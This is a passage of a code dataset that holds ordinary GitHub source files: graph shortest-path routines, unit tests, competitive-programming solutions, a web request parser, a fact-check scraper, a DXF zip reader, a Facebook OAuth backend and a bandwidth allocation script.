current_road=road(name,length,rtype)\r\n    areas[area1].ways.add((areas[area2],current_road))\r\n    areas[area2].ways.add((areas[area1],current_road))\r\n    \r\n    global added_data\r\n    added_data=added_data+f'{name},{area1},{area2},{length},{rtype},ROAD\\n'\r\n    \r\ndef shortest_path(starting_area,destination):\r\n    '''finds the shortest path and its length using Dijkstra's algorithm with a heap'''\r\n    pq =[]\r\n    dist={}\r\n    path={}\r\n    dist[starting_area]=0\r\n    path[starting_area]=(starting_area,)\r\n    heapq.heappush(pq, (0, starting_area))\r\n    \r\n    while pq:\r\n        current=heapq.heappop(pq)[1]\r\n        for city,road in areas[current].ways:\r\n            city_name=city.name\r\n            if dist.setdefault(city_name,float('inf')) > dist[current]+road.length:\r\n                dist[city_name]=dist[current]+road.length\r\n                heapq.heappush(pq, (dist[city_name], city_name))\r\n                path[city_name]=path[current]+(road.name,city_name)\r\n    \r\n    return {'path':path[destination],'distance':dist[destination]}\r\n\r\ndef fastest_path(starting_area,destination):\r\n    '''finds the fastest path and its travel time using Dijkstra's algorithm'''\r\n    pq =[]\r\n    time={}\r\n    path={}\r\n    time[starting_area]=0\r\n    path[starting_area]=(starting_area,)\r\n    heapq.heappush(pq, (0, starting_area))\r\n    while pq:\r\n        current=heapq.heappop(pq)[1]\r\n        for city,road in areas[current].ways:\r\n            city_name=city.name\r\n            if time.setdefault(city_name,float('inf')) > time[current]+(road.length/road.speed):\r\n                time[city_name]=time[current]+(road.length/road.speed)\r\n                heapq.heappush(pq, (time[city_name], city_name))\r\n                path[city_name]=path[current]+(road.name,city_name)\r\n    \r\n    return {'path':path[destination],'time':time[destination]}\r\n\r\ndef export_data(file_path='data.csv'):\r\n    global added_data\r\n    try:\r\n        file=open(file_path,'wt')\r\n        file.write(added_data)\r\n        file.close()\r\n        return True\r\n    except:\r\n        return False","repo_name":"Hamed-Sadat1/data_structure_project","sub_path":"back.py","file_name":"back.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44473260714","text":"# -*- coding: utf-8 -*-\n\"\"\"Test utilities.\"\"\"\nimport unittest2 as unittest\n\nfrom plone import api\n\nfrom collective.querynextprev.utils import (\n    expire_session_data, first_common_item, get_next_items, get_previous_items, clean_query)\nfrom collective.querynextprev.testing import COLLECTIVE_QUERYNEXTPREV_INTEGRATION_TESTING  # noqa #pylint: disable=C0301\n\n\nclass TestUtils(unittest.TestCase):\n\n    \"\"\"Test NextPrevNavigationViewlet.\"\"\"\n\n    layer = COLLECTIVE_QUERYNEXTPREV_INTEGRATION_TESTING\n\n    def setUp(self):\n        portal = api.portal.get()\n        self.request = portal.REQUEST\n\n    def tearDown(self):\n        if hasattr(self.request, 'SESSION'):\n            del 
self.request.SESSION\n\n def test_expire_session_data(self):\n \"\"\"Test expire_session_data function.\"\"\"\n request = self.request\n request.SESSION = {}\n expire_session_data(request)\n self.assertEqual(request.SESSION, {})\n\n request.SESSION = {\n 'foo': 'bar',\n 'querynextprev.foo': 'bar',\n 'querynextprev.bar': 'foo',\n }\n expire_session_data(request)\n self.assertEqual(request.SESSION, {'foo': 'bar'})\n\n def test_first_common_item(self):\n \"\"\"Test first common item util.\"\"\"\n l1 = [4, 5, 6, 7]\n l2 = [1, 2, 6, 7]\n\n self.assertEqual(\n first_common_item(l1, l2),\n 6)\n\n l1 = [1, 2, 4, 5, 6, 7]\n l2 = [1, 2, 6, 7]\n self.assertEqual(\n first_common_item(l1, l2),\n 1)\n\n l1 = [4, 5, 6, 7]\n l2 = [1, 2]\n self.assertIsNone(\n first_common_item(l1, l2))\n\n l1 = [1]\n l2 = [1]\n self.assertEqual(\n first_common_item(l1, l2),\n 1)\n\n def test_get_next_items(self):\n \"\"\"Test get_next_items function.\"\"\"\n lst = range(40)\n index = 19\n self.assertEqual(\n get_next_items(lst, index),\n range(20, 30)\n )\n\n index = 35\n self.assertEqual(\n get_next_items(lst, index),\n range(36, 40)\n )\n\n self.assertEqual(\n get_next_items(lst, index, include_index=True),\n range(35, 40)\n )\n\n def test_get_previous_items(self):\n \"\"\"Test get_previous_items function.\"\"\"\n lst = range(40)\n index = 21\n self.assertEqual(\n get_previous_items(lst, index),\n range(11, 21)\n )\n\n index = 5\n self.assertEqual(\n get_previous_items(lst, index),\n range(5)\n )\n\n self.assertEqual(\n get_previous_items(lst, index, include_index=True),\n range(6)\n )\n\n def test_clean_query(self):\n query = {'sort_order': 'descending', 'Language': ['fr', ''], 'sort_on': 'created',\n 'facet.field': ['', u'review_state', u'treating_groups', u'assigned_user', u'recipient_groups',\n u'mail_type'],\n 'b_size': 24, 'b_start': 0, 'portal_type': {'query': ['dmsincomingmail']}}\n self.assertDictEqual(clean_query(query), {'sort_order': 'descending', 'Language': ['fr', ''],\n 'sort_on': 'created', 'portal_type': {'query': ['dmsincomingmail']}})\n","repo_name":"collective/collective.querynextprev","sub_path":"src/collective/querynextprev/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15039498609","text":"N = int(input())\r\nitems = []\r\nfor _ in range(N):\r\n items.append(tuple(map(int, input().split())))\r\n\r\n\r\ndef check(x):\r\n f = True\r\n remain = [0] * N\r\n for i in range(N):\r\n h, s = items[i]\r\n remain[i] = (x - h) / s\r\n remain.sort()\r\n tmp = -1\r\n for r in remain:\r\n tmp += 1\r\n if tmp <= r:\r\n continue\r\n else:\r\n f = False\r\n break\r\n\r\n return f\r\n\r\n\r\nok = 10 ** 20\r\nng = 0\r\nt = 0\r\nwhile ok - ng > 1:\r\n mid = (ok + ng) // 2\r\n if check(mid):\r\n ok = mid\r\n else:\r\n ng = mid\r\n\r\nprint(ok)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc023/D/4068603.py","file_name":"4068603.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"23719523450","text":"def max_sum():\n\tnum_lst = []\n\ttotal_lst = []\n\ttry:\n\t\twith open('maxtriangle.txt', 'r') as fin:\n\t\t\tfor line in fin:\n\t\t\t\tnum_lst.append([int(x) for x in line.split()])\n\t\n\texcept FileNotFoundError: \n\t\tprint('File not found.')\n\t\n\tfor row in range(len(num_lst)-2, -1, -1):\n\t\tfor column in range(0, 
row+1):\n\t\t\tnum_lst[row][column] += max(num_lst[row+1][column], num_lst[row+1][column+1])\n\t\n\tmax_num = num_lst[row][column]\n\tcurrent_max = max_num \n\n\tfor row in range(len(num_lst)-1):\n\t\tfor column in range(0, row+1):\n\t\t\tif num_lst[row][column] == current_max:\n\t\t\t\ttotal_lst.append(current_max - max(num_lst[row+1][column], num_lst[row+1][column+1]))\n\t\t\t\tcurrent_max = max(num_lst[row+1][column], num_lst[row+1][column+1])\n\ttotal_lst.append(current_max)\n\t# print(total_lst)\n\t\n\tfinal_x = \"\"\n\tfor x in total_lst:\n\t\tif x != total_lst[len(total_lst)-1]:\n\t\t\tfinal_x += str(x) + \" + \"\n\t\telse:\n\t\t\tfinal_x += str(x) + \" = \" + str(max_num)\n\t\t\n\n\tprint(final_x)\n\n\n\n\n\n\t\n# \t\tfor numbers in range(1, len(line)):\n# \t\t\tnumbers = int(numbers)\n# \t\t\t#start from the second line to add to the first line\n# \t\t\t# all the left side -- remain one route all the way down\n# \t\t\tline[numbers][0]+= line[numbers-1][0]\n# \t\t\t# find the max sum of the middle \n# \t\t\twidth = len(lines[numbers]) \n# \t\t\tfor mid_num in range(1, width-1):\n# \t\t\t\tline[numbers][mid_num]+= max(line[numbers-1][mid_num], line[numbers-1][mid_num-1])\n# \t\t\t# right side -- remain one route all the way down\n# \t\t\tline[numbers][width-1]+= line[numbers-1][width-2]\n\n\n\n\n#############################################################################\ndef main():\n\n\tmax_sum()\n\n\n\n\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n","repo_name":"nyhyang/Info206-Python","sub_path":"HW9_FunctionalProgramming/hw9.3.nyhyang.py","file_name":"hw9.3.nyhyang.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72393000552","text":"import sys\ninput = sys.stdin.readline\n\nfrom collections import deque\n\nn, m = map(int, input().split())\nadj = [[] for _ in range(n+1)]\n\nfor _ in range(m):\n a, b = map(int, input().split())\n adj[a].append(b)\n adj[b].append(a)\n\nans = 0\nvisit = [False]*(n+1)\nwhile True:\n q = deque()\n flag = False\n for i in range(1,n+1):\n if not visit[i]:\n visit[i] = True\n q.append(i)\n flag = True\n break\n\n while q:\n now = q.popleft()\n for ele in adj[now]:\n if not visit[ele]:\n visit[ele] = True\n q.append(ele)\n\n if not flag:\n break\n else:\n ans += 1\nprint(ans)","repo_name":"112224/algorithm","sub_path":"python3/11724 연결 요소의 갯수.py","file_name":"11724 연결 요소의 갯수.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28915126635","text":"from itertools import permutations\nn = int(input())\na = [[0]*(2*n-1)]*(2*n-1)\n\nfor i in range(2*n-1):\n a[i] = list(map(int, input().split()))\nans = 0\nfor comb1 in permutations(range(2*n),n):\n comb2 = [i for i in range(2*n) if i not in comb1]\n x0 = 0\n for i in range(n):\n \n x = a[min(comb1[i], comb2[i])][max(comb1[i], comb2[i]) -1 - min(comb1[i], comb2[i])]\n x0 = x0^x\n\n ans = max(ans, x0)\nprint(ans)\n\n","repo_name":"monarsan/atcoder","sub_path":"contest/202201/abc0123/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16680121717","text":"import artemis\nimport os\n\n\n# Set inputs.\nthis_file_dir = os.path.dirname(__file__)\nscenario_file = os.path.join(this_file_dir, 'default_config.yml') # Config file that needs to be run.\noutput_subfolder = 
os.path.join(this_file_dir, 'example_output/') # Determines output directory.\n\n# Run the simulation.\nscenario_data = artemis.io.read_data_from_yml(scenario_file) # Read scenario_file.\nartemis.run_artemis(scenario_data, output_subfolder, save_config=False)\n","repo_name":"gijntema/artemis","sub_path":"scripts/default_scenario.py","file_name":"default_scenario.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13741092094","text":"import json\n\nfrom modules.requests.methods import Methods\nfrom modules.requests.request import Request\n\n\nclass RequestParser:\n \"\"\"\n Parse the request in order to get:\n - method\n - url\n - parameters\n - post data\n \"\"\"\n\n def _parse_parameters(self, path):\n url = path\n parameters = {}\n\n # Check if there are get parameters\n if '?' in path:\n url, params = path.split('?')\n\n # Check if there are multiple parameters\n if '&' in params:\n params = params.split('&')\n else:\n params = [params]\n\n # Build the parameters's dictionary\n for param in params:\n name, value = None, None\n if '=' in param:\n name, value = param.split('=')\n else:\n name = param\n parameters.update({name: value})\n\n return url, parameters\n\n def _parse_post_data(self, connection):\n \"\"\"\n Unpack the post data (if present)\n \"\"\"\n\n data = None\n\n # Check if it's a POST request\n if connection.command == Methods.POST:\n\n # Try to load the json data from the request.\n # Only data form accepted is JSON\n try:\n content_len = int(connection.headers['content-length'])\n data = json.loads(connection.rfile.read(content_len).decode())\n except:\n pass\n return data\n\n def parse(self, connection):\n \"\"\"\n Unpack the request\n \"\"\"\n method = connection.command\n url, parameters = self._parse_parameters(connection.path)\n data = self._parse_post_data(connection)\n\n return Request(connection, method, url, parameters, data)\n","repo_name":"alemazzo/WebServerReti","sub_path":"modules/requests/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38899465049","text":"# Source : https://leetcode.com/problems/group-anagrams/description/\n\n# Algo/DS : String\n\n# Complexity : O(n (Klogk)) where k is length of longest string and n\n# is number of strings\n\nclass Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n d = {} \n for word in strs:\n key = \"\".join(sorted(word))\n d[key] = d.get(key,[]) + [word] \n return d.values()\n \n ","repo_name":"neelamy/Leetcode","sub_path":"String/49_GroupAnagrams.py","file_name":"49_GroupAnagrams.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8251173413","text":"# -*- coding: utf-8 -*-\nimport re\nfrom typing import List, Set\n\nfrom bs4 import BeautifulSoup\nfrom dateparser.search import search_dates\nfrom tqdm import tqdm\n\nfrom claim_extractor import Claim, Configuration\nfrom claim_extractor.extractors import FactCheckingSiteExtractor, caching\n\n\nclass PolitifactFactCheckingSiteExtractor(FactCheckingSiteExtractor):\n\n def __init__(self, configuration: Configuration):\n super().__init__(configuration)\n\n def retrieve_listing_page_urls(self) -> List[str]:\n listings_url = 
\"https://www.politifact.com/truth-o-meter/rulings/\"\n page = caching.get(listings_url, headers=self.headers, timeout=5)\n parsed = BeautifulSoup(page, \"lxml\")\n main_tag = parsed.find(\"main\", {\"class\": \"main\"}) # type: BeautifulSoup\n links = main_tag.find_all(\"a\", href=True)\n return [\"http://www.politifact.com\" + link['href'] for link in links]\n\n def find_page_count(self, parsed_listing_page: BeautifulSoup) -> int:\n page_text = parsed_listing_page.find(\"span\", {\"class\": \"step-links__current\"}).text.strip()\n page_re = re.compile(\"Page [0-9]+ of ([0-9]+)\")\n max_page = int(page_re.match(page_text).group(1))\n return max_page\n\n def retrieve_urls(self, parsed_listing_page: BeautifulSoup, listing_page_url: str, number_of_pages: int) \\\n -> List[str]:\n urls = self.extract_urls(parsed_listing_page)\n for page_number in tqdm(range(2, number_of_pages)):\n url = listing_page_url + \"?page=\" + str(page_number)\n page = caching.get(url, headers=self.headers, timeout=5)\n current_parsed_listing_page = BeautifulSoup(page, \"lxml\")\n urls += self.extract_urls(current_parsed_listing_page)\n return urls\n\n def extract_urls(self, parsed_listing_page: BeautifulSoup):\n urls = list()\n links = parsed_listing_page.findAll(\"p\", {\"class\": \"statement__text\"})\n for anchor in links:\n anchor = anchor.find('a', {\"class\": \"link\"}, href=True)\n url = \"http://www.politifact.com\" + str(anchor['href'])\n max_claims = self.configuration.maxClaims\n if 0 < max_claims <= len(urls):\n break\n if url not in self.configuration.avoid_urls:\n urls.append(url)\n return urls\n\n def extract_claim_and_review(self, parsed_claim_review_page: BeautifulSoup, url: str) -> List[Claim]:\n claim = Claim()\n claim.set_url(url)\n claim.set_source(\"politifact\")\n\n # title\n title = parsed_claim_review_page.find(\"h1\", {\"class\": \"article__title\"})\n claim.set_title(title.text)\n\n # date\n date = parsed_claim_review_page.find('div', {\"class\": \"widget__content\"}).find(\"p\")\n if date:\n date_str = search_dates(date.text)[0][1].strftime(\"%Y-%m-%d\")\n claim.set_date(date_str)\n\n # rating\n rating_div = parsed_claim_review_page.find(\"div\", {\"itemprop\": \"reviewRating\"})\n if rating_div:\n rating_value = rating_div.find(\"div\", {\"itemprop\": \"ratingValue\"})\n if rating_value:\n claim.rating_value = rating_value.text\n worst_rating = rating_div.find(\"div\", {\"itemprop\": \"worstRating\"})\n if worst_rating:\n claim.worst_rating = worst_rating.text\n\n best_rating = rating_div.find(\"div\", {\"itemprop\": \"bestRating\"})\n if best_rating:\n claim.best_rating = best_rating.text\n\n alternate_name = rating_div.find(\"div\", {\"itemprop\": \"alternateName\"})\n if alternate_name:\n claim.alternate_name = alternate_name.text\n else:\n statement_detail = parsed_claim_review_page.find(\"img\", {\"class\", \"statement-detail\"})\n if statement_detail:\n claim.alternate_name = statement_detail['alt']\n\n # body\n body = parsed_claim_review_page.find(\"div\", {\"class\": \"article__text\"})\n claim.set_body(body.get_text())\n\n # author\n statement_meta = parsed_claim_review_page.find(\"p\", {\"class\": \"statement__meta\"})\n if statement_meta:\n author = statement_meta.find(\"a\").text\n claim.set_author(author)\n else:\n author = parsed_claim_review_page.find(\"div\", {\"itemprop\": \"itemReviewed\"})\n if author:\n author = author.find(\"div\", {\"itemprop\": \"author\"})\n author_text = author.text\n claim.set_author(author_text)\n\n # same as\n rating_div = 
parsed_claim_review_page.find(\"div\", {\"itemprop\": \"itemReviewed\"})\n if rating_div and rating_div.find(\"div\", {\"itemprop\": \"sameAs\"}):\n claim.setSameAs(rating_div.find(\"div\", {\"itemprop\": \"sameAs\"}).get_text())\n\n # date published\n if statement_meta:\n meta_text = statement_meta.text\n if \"on\" in meta_text:\n meta_text = meta_text.split(\" on \")[1]\n if \"in\" in meta_text:\n meta_text = meta_text.split(\" in \")[0]\n if meta_text:\n date = search_dates(meta_text)\n if date:\n date = date[0][1].strftime(\"%Y-%m-%d\")\n claim.setDatePublished(date)\n else:\n rating_div = parsed_claim_review_page.find(\"div\", {\"itemprop\": \"itemReviewed\"})\n if rating_div and rating_div.find(\"div\", {\"itemprop\": \"datePublished\"}):\n claim.setDatePublished(rating_div.find(\"div\", {\"itemprop\": \"datePublished\"}).get_text())\n\n # related links\n div_tag = parsed_claim_review_page.find(\"div\", {\"class\": \"article__text\"})\n related_links = []\n for link in div_tag.findAll('a', href=True):\n related_links.append(link['href'])\n claim.set_refered_links(related_links)\n\n claim.set_claim(parsed_claim_review_page.find(\"div\", {\"class\": \"statement__text\"}).text.strip())\n\n tags = []\n about_widget = parsed_claim_review_page.find(\"div\", {\"class\", \"widget_about-article\"})\n if about_widget:\n about_widget_contents = about_widget.find(\"div\", {\"class\", \"widget__content\"})\n for p in about_widget_contents.findAll(\"p\"):\n text = p.text\n if \"Subjects:\" in text:\n for subject in p.findAll(\"a\"):\n tags.append(subject.text)\n\n claim.set_tags(\",\".join(tags))\n\n return [claim]\n","repo_name":"eleutheromastrophimatique/ClaimsExtractor-","sub_path":"claim_extractor/extractors/politifact.py","file_name":"politifact.py","file_ext":"py","file_size_in_byte":6489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13542903749","text":"from typing import BinaryIO, cast, TextIO, List\nimport zipfile\nfrom contextlib import contextmanager\n\nfrom ezdxf.lldxf.validator import is_dxf_stream, dxf_info\n\nWIN_NEW_LINE = b'\\r\\n'\nNEW_LINE = b'\\n'\n\n\nclass ZipReader:\n def __init__(self, zip_archive_name: str):\n if not zipfile.is_zipfile(zip_archive_name):\n raise IOError(\"'{}' is not a zip archive.\".format(zip_archive_name))\n self.zip_archive_name = zip_archive_name\n self.zip_archive = None # type: zipfile.ZipFile\n self.dxf_file_name = None # type: str\n self.dxf_file = None # type: BinaryIO\n self.encoding = 'cp1252'\n self.dxfversion = 'AC1009'\n\n def open(self, dxf_file_name: str = None) -> None:\n def open_dxf_file() -> BinaryIO:\n return self.zip_archive.open(self.dxf_file_name) # open always in binary mode\n\n self.zip_archive = zipfile.ZipFile(self.zip_archive_name)\n self.dxf_file_name = dxf_file_name if dxf_file_name is not None else self.get_first_dxf_file_name()\n self.dxf_file = open_dxf_file()\n\n # reading with standard encoding 'cp1252' - readline() fails if leading comments contain none ascii characters\n if not is_dxf_stream(cast(TextIO, self)):\n raise IOError(\"'{}' is not a DXF file.\".format(self.dxf_file_name))\n self.dxf_file = open_dxf_file() # restart\n self.get_dxf_info()\n self.dxf_file = open_dxf_file() # restart\n\n def get_first_dxf_file_name(self) -> str:\n dxf_file_names = self.get_dxf_file_names()\n if len(dxf_file_names) > 0:\n return dxf_file_names[0]\n else:\n raise IOError(\"'{}' has no DXF files.\")\n\n def get_dxf_file_names(self) -> List[str]:\n return [name for 
name in self.zip_archive.namelist() if name.lower().endswith('.dxf')]\n\n def get_dxf_info(self) -> None:\n info = dxf_info(cast(TextIO, self))\n # since DXF R2007 (AC1021) file encoding is always 'utf-8'\n self.encoding = info.encoding if info.version < 'AC1021' else 'utf-8'\n self.dxfversion = info.version\n\n # required TextIO interface\n def readline(self) -> str:\n next_line = self.dxf_file.readline().replace(WIN_NEW_LINE, NEW_LINE)\n return str(next_line, self.encoding)\n\n def close(self) -> None:\n self.zip_archive.close()\n\n\n@contextmanager\ndef ctxZipReader(zipfilename: str, filename: str = None) -> ZipReader:\n zip_reader = ZipReader(zipfilename)\n zip_reader.open(filename)\n yield zip_reader\n zip_reader.close()\n","repo_name":"tapnair/DXFImporter","sub_path":"DXFImporter/lib/ezdxf/tools/zipmanager.py","file_name":"zipmanager.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"41955297156","text":"\"\"\"\nFacebook OAuth support.\n\nThis contribution adds support for Facebook OAuth service. The settings\nFACEBOOK_APP_ID and FACEBOOK_API_SECRET must be defined with the values\ngiven by Facebook application registration process.\n\nExtended permissions are supported by defining FACEBOOK_EXTENDED_PERMISSIONS\nsetting, it must be a list of values to request.\n\nBy default account id and token expiration time are stored in extra_data\nfield, check OAuthBackend class for details on how to extend it.\n\"\"\"\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nimport cgi\nfrom urllib import urlencode\nfrom urllib2 import urlopen\n\nfrom django.conf import settings\nfrom django.utils import simplejson\nfrom django.contrib.auth import authenticate\n\nfrom social_auth.backends import BaseOAuth2, OAuthBackend, USERNAME\nfrom social_auth.utils import sanitize_log_data\n\n\n# Facebook configuration\nEXPIRES_NAME = getattr(settings, 'SOCIAL_AUTH_EXPIRATION', 'expires')\nFACEBOOK_ME = 'https://graph.facebook.com/me?'\n\n\nclass FacebookBackend(OAuthBackend):\n \"\"\"Facebook OAuth2 authentication backend\"\"\"\n name = 'facebook'\n # Default extra data to store\n EXTRA_DATA = [('id', 'id'), ('expires', EXPIRES_NAME)]\n\n def get_user_details(self, response):\n \"\"\"Return user details from Facebook account\"\"\"\n return {USERNAME: response.get('username'),\n 'email': response.get('email', ''),\n 'fullname': response['name'],\n 'first_name': response.get('first_name', ''),\n 'last_name': response.get('last_name', '')}\n\n\nclass FacebookAuth(BaseOAuth2):\n \"\"\"Facebook OAuth2 support\"\"\"\n AUTH_BACKEND = FacebookBackend\n RESPONSE_TYPE = None\n SCOPE_SEPARATOR = ','\n AUTHORIZATION_URL = 'https://www.facebook.com/dialog/oauth'\n SETTINGS_KEY_NAME = 'FACEBOOK_APP_ID'\n SETTINGS_SECRET_NAME = 'FACEBOOK_API_SECRET'\n\n def get_scope(self):\n return getattr(settings, 'FACEBOOK_EXTENDED_PERMISSIONS', [])\n\n def user_data(self, access_token):\n \"\"\"Loads user data from service\"\"\"\n data = None\n url = FACEBOOK_ME + urlencode({'access_token': access_token})\n\n try:\n data = simplejson.load(urlopen(url))\n logger.debug('Found user data for token %s',\n sanitize_log_data(access_token),\n extra=dict(data=data))\n except ValueError:\n extra = {'access_token': sanitize_log_data(access_token)}\n logger.error('Could not load user data from Facebook.',\n exc_info=True, extra=extra)\n return data\n\n def auth_complete(self, *args, **kwargs):\n \"\"\"Completes loging process, must return 
user instance\"\"\"\n if 'code' in self.data:\n url = 'https://graph.facebook.com/oauth/access_token?' + \\\n urlencode({'client_id': settings.FACEBOOK_APP_ID,\n 'redirect_uri': self.redirect_uri,\n 'client_secret': settings.FACEBOOK_API_SECRET,\n 'code': self.data['code']})\n response = cgi.parse_qs(urlopen(url).read())\n access_token = response['access_token'][0]\n data = self.user_data(access_token)\n if data is not None:\n if 'error' in data:\n error = self.data.get('error') or 'unknown error'\n raise ValueError('Authentication error: %s' % error)\n data['access_token'] = access_token\n # expires will not be part of response if offline access\n # premission was requested\n if 'expires' in response:\n data['expires'] = response['expires'][0]\n kwargs.update({'response': data, self.AUTH_BACKEND.name: True})\n return authenticate(*args, **kwargs)\n else:\n error = self.data.get('error') or 'unknown error'\n raise ValueError('Authentication error: %s' % error)\n\n @classmethod\n def enabled(cls):\n \"\"\"Return backend enabled status by checking basic settings\"\"\"\n return all(hasattr(settings, name) for name in ('FACEBOOK_APP_ID',\n 'FACEBOOK_API_SECRET'))\n\n\n# Backend definition\nBACKENDS = {\n 'facebook': FacebookAuth,\n}\n","repo_name":"sameenjalal/mavenize","sub_path":"mavenize-boilerplate/mavenize-alpha/django/lib/python2.6/site-packages/social_auth/backends/facebook.py","file_name":"facebook.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"37746068454","text":"import csv\nimport math\nimport sys\nimport os\nimport os.path as osp\n\n# NOTE 提交前记得修改路径\ninput_path = \"data/\"\noutput_path = \"output/solution.txt\"\n\ndef getSiteBandwidth():\n site_bandwidth = {}\n with open(osp.join(input_path, \"site_bandwidth.csv\")) as f:\n f_csv = csv.reader(f)\n headers = next(f_csv)\n for row in f_csv:\n site_bandwidth[row[0]] = int(row[1])\n N = len(site_bandwidth) # N site\n return site_bandwidth, N\n\ndef getQoSConstraint():\n with open(osp.join(input_path, \"config.ini\"), mode='r') as f:\n qos_constraint = int(f.readlines()[1].split(\"=\")[-1])\n return qos_constraint\n\ndef getQoS():\n qos = {}\n with open(osp.join(input_path, \"qos.csv\")) as f:\n f_csv = csv.reader(f)\n headers = next(f_csv)\n M = len(headers) - 1\n for row in f_csv:\n for i in range(M):\n qos[(row[0], headers[i+1])] = int(row[i+1])\n return qos\n\ndef getDemand():\n demand = {}\n with open(osp.join(input_path, \"demand.csv\")) as f:\n f_csv = csv.reader(f)\n headers = next(f_csv)\n M = len(headers) - 1 # M client\n for row in f_csv:\n for i in range(M):\n if headers[i+1] not in demand.keys():\n demand[headers[i+1]] = [int(row[i+1])]\n else:\n demand[headers[i+1]].append(int(row[i+1]))\n T = len(demand[headers[1]]) # T\n return demand, T\n\n\ndemand, timestamps = getDemand()\nqos_constraint = getQoSConstraint()\nqos = getQoS()\nsite_bandwidth, site_number = getSiteBandwidth()\n\n \nif __name__=='__main__':\n solution = open(output_path,mode='w')\n\n # print('demand:', demand)\n # print('timestamps:', timestamps)\n # print('qos_constraint:', qos_constraint)\n # print('qos:', qos)\n # print('site_bandwidth:', site_bandwidth)\n # print('site_number:', site_number)\n\n # 记录每一个客户可用的边缘节点\n site4client = {}\n for m in demand.keys():\n for n in site_bandwidth.keys():\n # print(n, m)\n # print(qos[(n, m)])\n if qos[(n, m)] < qos_constraint:\n if m not in site4client.keys():\n site4client[m] = [n]\n else:\n 
site4client[m].append(n)\n # print('site4client:', site4client)\n # print(site4client['A'])\n\n # the clients each edge node can serve\n client4site = {}\n for n in site_bandwidth.keys():\n for m in demand.keys():\n if qos[(n, m)] < qos_constraint:\n if n not in client4site.keys():\n client4site[n] = [m]\n else:\n client4site[n].append(m)\n\n # print(client4site)\n \n line_count = 0\n for t in range(timestamps):\n client_info = {}\n for client in list(demand.keys()):\n # print(demand[client][t])\n client_info[client] = [demand[client][t]]\n client_info[client].append(demand[client][t])\n client_info[client].append(len(site4client[client]))\n \n # print(client_info)\n\n # for client in list(client_info.keys()):\n # print(client)\n \n # sort clients by the number of available edge nodes, ascending\n client_info_order = sorted(client_info.items(), key=lambda x:x[1][2], reverse=False)\n # print(client_info_order)\n\n # for client in [x[0] for x in client_info_order]:\n # print(client)\n\n site_info = {}\n for site in list(site_bandwidth.keys()):\n # print(site_bandwidth[site])\n site_info[site] = [site_bandwidth[site]]\n site_info[site].append(site_bandwidth[site])\n # print(site_info['DZ'])\n\n for client in [x[0] for x in client_info_order]:\n line_count += 1\n solution.write(client + ":")\n if client_info[client][0] == 0:\n solution.write('\\n')\n continue\n while(client_info[client][1] > 0):\n # print(client)\n # print(site4client[client])\n actual_site = list(site4client[client])\n average_bandwidth = math.ceil(client_info[client][1] /len(actual_site))\n # print(average_bandwidth)\n for site in list(actual_site):\n # print(site_info[site][1])\n if site_info[site][1] >= average_bandwidth:\n client_info[client][1] -= average_bandwidth\n site_info[site][1] -= average_bandwidth\n if client_info[client][1] <= 0:\n site_info[site][1] += (0 - client_info[client][1])\n break\n else:\n actual_site.remove(site)\n \n\n # print(actual_site)\n if len(actual_site) == 0:\n print('No feasible solution')\n solution.close()\n os.remove(output_path)\n sys.exit(1)\n\n count = 0\n writed_site_count = 0\n for site in list(site4client[client]):\n count += 1 # number of edge nodes used so far\n assigned_bandwidth = site_info[site][0] - site_info[site][1]\n site_info[site][0] = site_info[site][1]\n if assigned_bandwidth != 0:\n if assigned_bandwidth < 0:\n print(" computation error ")\n # not at the last edge node yet\n if count < len(list(site4client[client])):\n # if count == 1:\n # solution.write("<" + site + "," + str(assigned_bandwidth) + ">")\n # writed_site_count += 1\n # else:\n if writed_site_count == 0:\n solution.write("<" + site + "," + str(assigned_bandwidth) + ">")\n writed_site_count += 1\n \n elif writed_site_count > 0:\n solution.write(",<" + site + "," + str(assigned_bandwidth) + ">")\n writed_site_count += 1\n \n else:\n if line_count != timestamps*len(demand):\n solution.write(",<" + site + "," + str(assigned_bandwidth) + ">\\n")\n \n elif line_count == timestamps*len(demand):\n solution.write(",<" + site + "," + str(assigned_bandwidth) + ">")\n \n else:\n if count == len(list(site4client[client])) and line_count != timestamps*len(demand):\n solution.write("\\n")\n \n #check\n # print(t)\n total_demand = 0\n for client in list(client_info.keys()):\n # print(client)\n # print(client_info[client][0], client_info[client][1])\n total_demand += client_info[client][0]\n if client_info[client][1] > 0:\n print("Insufficient allocation")\n solution.close()\n os.remove(output_path)\n sys.exit()\n \n total_assigned = 0\n for site in list(site_info.keys()):\n # 
